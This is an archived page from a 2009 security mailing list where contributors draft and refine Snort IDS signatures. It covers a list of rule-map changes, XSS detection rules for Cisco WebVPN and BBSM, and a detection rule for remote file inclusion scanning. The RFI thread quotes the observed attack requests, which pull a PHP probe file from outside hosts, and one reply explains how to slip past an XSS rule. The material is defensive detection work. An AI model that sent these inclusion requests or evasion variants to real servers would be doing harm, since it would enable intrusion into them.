        2510439 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510440 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510441 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510442 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510443 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510444 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510445 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510446 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510447 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510448 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510449 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510450 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510451 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510452 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510453 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510454 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510455 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510456 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510457 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510458 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510459 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510460 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510461 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510462 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510463 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510464 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510465 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510466 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510467 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510468 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510469 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (99):
        2007827 || ET TROJAN Suspicious User-Agent - Possible Trojan Downloader (ie) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2007827
        2010012 || ET WEB_CLIENT ACTIVEX Possible KeyWorks KeyHelp Module keyhelp.ocx ActiveX Control Remote Buffer Overflow Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Keyworks || url,doc.emergingthreats.net/2010012 || url,www.securityfocus.com/bid/36546/info
        2010333 || ET USER-AGENTS Suspicious User Agent (CrazyBro) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Suspicious || url,doc.emergingthreats.net/2010333 || url,anubis.iseclab.org/?action=result&task_id=14118b80c1b346124c183394d5b3004b1&format=html || url,www.threatexpert.com/report.aspx?md5=e4664144f8e95cfec510d5efa24a35e7 || url,www.threatexpert.com/report.aspx?md5=fd2d6bb1d2a9803c49f1e175d558a934 || url,www.f-secure.com/v-descs/trojan-proxy_w32_kvadr_gen!a.shtml
        2500422 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500423 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500424 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500425 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500426 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500427 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500428 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500429 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500430 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500431 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500432 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500433 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500434 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500435 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500436 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500437 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500438 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500439 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500440 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500441 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500442 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500443 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500444 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500445 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500446 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500447 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500448 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500449 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500450 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500451 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500452 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500453 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500454 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500455 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500456 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500457 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500458 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500459 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500460 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500461 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500462 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500463 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500464 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500465 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500466 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500467 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500468 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500469 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510422 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510423 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (212) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510424 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510425 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (213) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510426 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510427 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (214) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510428 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510429 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (215) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510430 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510431 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (216) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510432 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510433 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (217) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510434 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510435 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (218) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510436 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510437 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (219) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510438 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510439 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (220) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510440 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510441 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (221) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510442 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510443 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (222) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510444 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510445 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (223) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510446 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510447 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (224) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510448 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510449 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (225) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510450 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510451 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (226) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510452 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510453 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (227) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510454 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510455 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (228) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510456 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510457 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (229) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510458 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510459 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (230) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510460 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510461 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (231) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510462 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510463 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (232) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510464 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510465 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (233) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510466 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510467 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (234) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510468 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510469 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (235) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From mike.cox52 at gmail.com  Thu Dec 10 16:01:12 2009
From: mike.cox52 at gmail.com (Mike Cox)
Date: Thu, 10 Dec 2009 15:01:12 -0600
Subject: [Emerging-Sigs] 2 Cisco Sigs
In-Reply-To: <e75cc74a0912101240r4a2f8709vb9549ddb76c9b329@mail.gmail.com>
References: <e75cc74a0912101240r4a2f8709vb9549ddb76c9b329@mail.gmail.com>
Message-ID: <6116b9e20912101301x51cbf859kf4db36c84aea8fce@mail.gmail.com>

For the first one, my not do a uricontent match instead of a content match
and match against the normalized URI buffer.  Then it wouldn't be as trivial
to circumvent.  For example, one could substitute "++" or "%20"  for the
single "+" (\x2B) and bypass this currently.

Mike Cox

On Thu, Dec 10, 2009 at 2:40 PM, Kevin Ross <kevross33 at googlemail.com>wrote:

> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER
> Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt";
> flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B
> 2F|index|2E|html|20|HTTP|2F|"; depth:31; nocase; content:"Host|3A|";
> within:20;
> pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui";
> classtype:attempted-user; reference:url,
> www.securityfocus.com/bid/34307/info; reference:url,
> tools.cisco.com/security/center/viewAlert.x?alertId=17950;
> reference:cve,2009-1220; sid:14000001; rev:1;)
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER
> Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt";
> flow:established,to_server;
> uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase;
> pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui";
> classtype:attempted-user; reference:url,
> www.securityfocus.com/bid/29191/info; reference:cve,2008-2165;
> sid:14000002; rev:1;)
>
> Kev
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091210/dc3a722f/attachment.html

From evilghost at packetmail.net  Thu Dec 10 16:13:35 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Thu, 10 Dec 2009 15:13:35 -0600
Subject: [Emerging-Sigs] 2 Cisco Sigs
In-Reply-To: <4B216151.400@packetmail.net>
References: <e75cc74a0912101240r4a2f8709vb9549ddb76c9b329@mail.gmail.com>	<4312B0FE-AE04-46BE-94C4-302FC227DA0C@jonkmans.com>
	<4B216151.400@packetmail.net>
Message-ID: <4B21647F.2060703@packetmail.net>

Adjusted PCRE, I like this one better:

pcre:"/(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";



evilghost at packetmail.net wrote:
> Matt, since we're detecting XSS I'd like to modify the signatures PCRE 
> (proposed earlier in the year) for these XSS sigs to catch all of the 
> DOM behaviors.  I could go back and modify all of Kevin's sigs and get a 
> huge COMBO-BREAKER and integer overflow the ET scoreboard.  I'll just 
> submit these two and if you agree, perhaps you can go back against the 
> XSS signs and sed in this new PCRE?
>
> See 
> http://lists.emergingthreats.net/pipermail/emerging-sigs/2009-November/004539.html 
> for the discussion.  I don't think matching on "src" or "img" in the 
> PCRE URI buffer is wise since it should be covered by the other DOM 
> event handlers.
>
> pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
>
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt"; 
> flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B 2F|index|2E|html|20|HTTP|2F|"; depth:31; 
> nocase; content:"Host|3A|"; within:20; 
> pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
> classtype:attempted-user; reference:url,www.securityfocus.com/bid/34307/info; reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=17950; 
> reference:cve,2009-1220; sid:14000001; rev:1;)
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt"; 
> flow:established,to_server; uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase; 
> pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
> classtype:attempted-user; reference:url,www.securityfocus.com/bid/29191/info; reference:cve,2008-2165; sid:14000002; rev:1;)
>
> - evilghost
>
> Matt Jonkman wrote:
>   
>> Posted, thanks Kevin!!
>>
>> Matt
>>
>> On Dec 10, 2009, at 3:40 PM, Kevin Ross wrote:
>>
>>   
>>     
>>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt"; flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B 2F|index|2E|html|20|HTTP|2F|"; depth:31; nocase; content:"Host|3A|"; within:20; pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui"; classtype:attempted-user; reference:url,www.securityfocus.com/bid/34307/info; reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=17950; reference:cve,2009-1220; sid:14000001; rev:1;)
>>>
>>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt"; flow:established,to_server; uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase; pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui"; classtype:attempted-user; reference:url,www.securityfocus.com/bid/29191/info; reference:cve,2008-2165; sid:14000002; rev:1;)
>>>     
>>>       
>> ----------------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Open Information Security Foundation (OISF)
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> http://www.openinformationsecurityfoundation.org
>> ----------------------------------------------------
>>
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>
>>
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>>   
>>     
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>   

From mike.cox52 at gmail.com  Fri Dec 11 09:14:39 2009
From: mike.cox52 at gmail.com (Mike Cox)
Date: Fri, 11 Dec 2009 08:14:39 -0600
Subject: [Emerging-Sigs] RFI exploit successful
Message-ID: <6116b9e20912110614r3d39f955ga238f7b8b27b9b20@mail.gmail.com>

I'm seeing the "Remote File Inclusion (monstor list http)" fire for RFI
scanning with requests like this:

GET /product.php?id=http://kb27.co.kr/data/id1.txt?? HTTP/1.1
GET /product.php?id=http://n34.biz/id1.txt???? HTTP/1.1

The file that is attempted to be included is this:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

Therefore I propose the following current event sig:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET 1024: (msg:"ET
CURRENT_EVENTS RFI Scanner Success (Fx29ID)"; flow:established,from_server;
content:"FeeLCoMzFeeLCoMz"; classtype:successful-user; reference:url,
kb27.co.kr/data/id1.txt; reference:url,n34.biz/id1.txt; sid:2010xxx; rev:1;)

Mike Cox
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091211/06efcedc/attachment.html

From scheidell at secnap.net  Fri Dec 11 09:34:19 2009
From: scheidell at secnap.net (Michael Scheidell)
Date: Fri, 11 Dec 2009 09:34:19 -0500
Subject: [Emerging-Sigs] RFI exploit successful
In-Reply-To: <6116b9e20912110614r3d39f955ga238f7b8b27b9b20@mail.gmail.com>
References: <6116b9e20912110614r3d39f955ga238f7b8b27b9b20@mail.gmail.com>
Message-ID: <4B22586B.6050108@secnap.net>

Mike Cox wrote:
> I'm seeing the "Remote File Inclusion (monstor list http)" fire for 
> RFI scanning with requests like this:
>
> GET /product.php?id=http://kb27.co.kr/data/id1.txt?? HTTP/1.1
> GET /product.php?id=http://n34.biz/id1.txt???? HTTP/1.1
>
> The file that is attempted to be included is this:
>
> <?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID 
> */ ?>
>
That tag changes a lot!, I have seen several varations on it, so that 
one, secifically, will only match some of them.



-- 
Michael Scheidell, CTO
Phone: 561-999-5000, x 1259
 > *| *SECNAP Network Security Corporation

    * Certified SNORT Integrator
    * 2008-9 Hot Company Award Winner, World Executive Alliance
    * Five-Star Partner Program 2009, VARBusiness
    * Best Anti-Spam Product 2008, Network Products Guide
    * King of Spam Filters, SC Magazine 2008


_________________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/
_________________________________________________________________________
   
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091211/420491f1/attachment.html

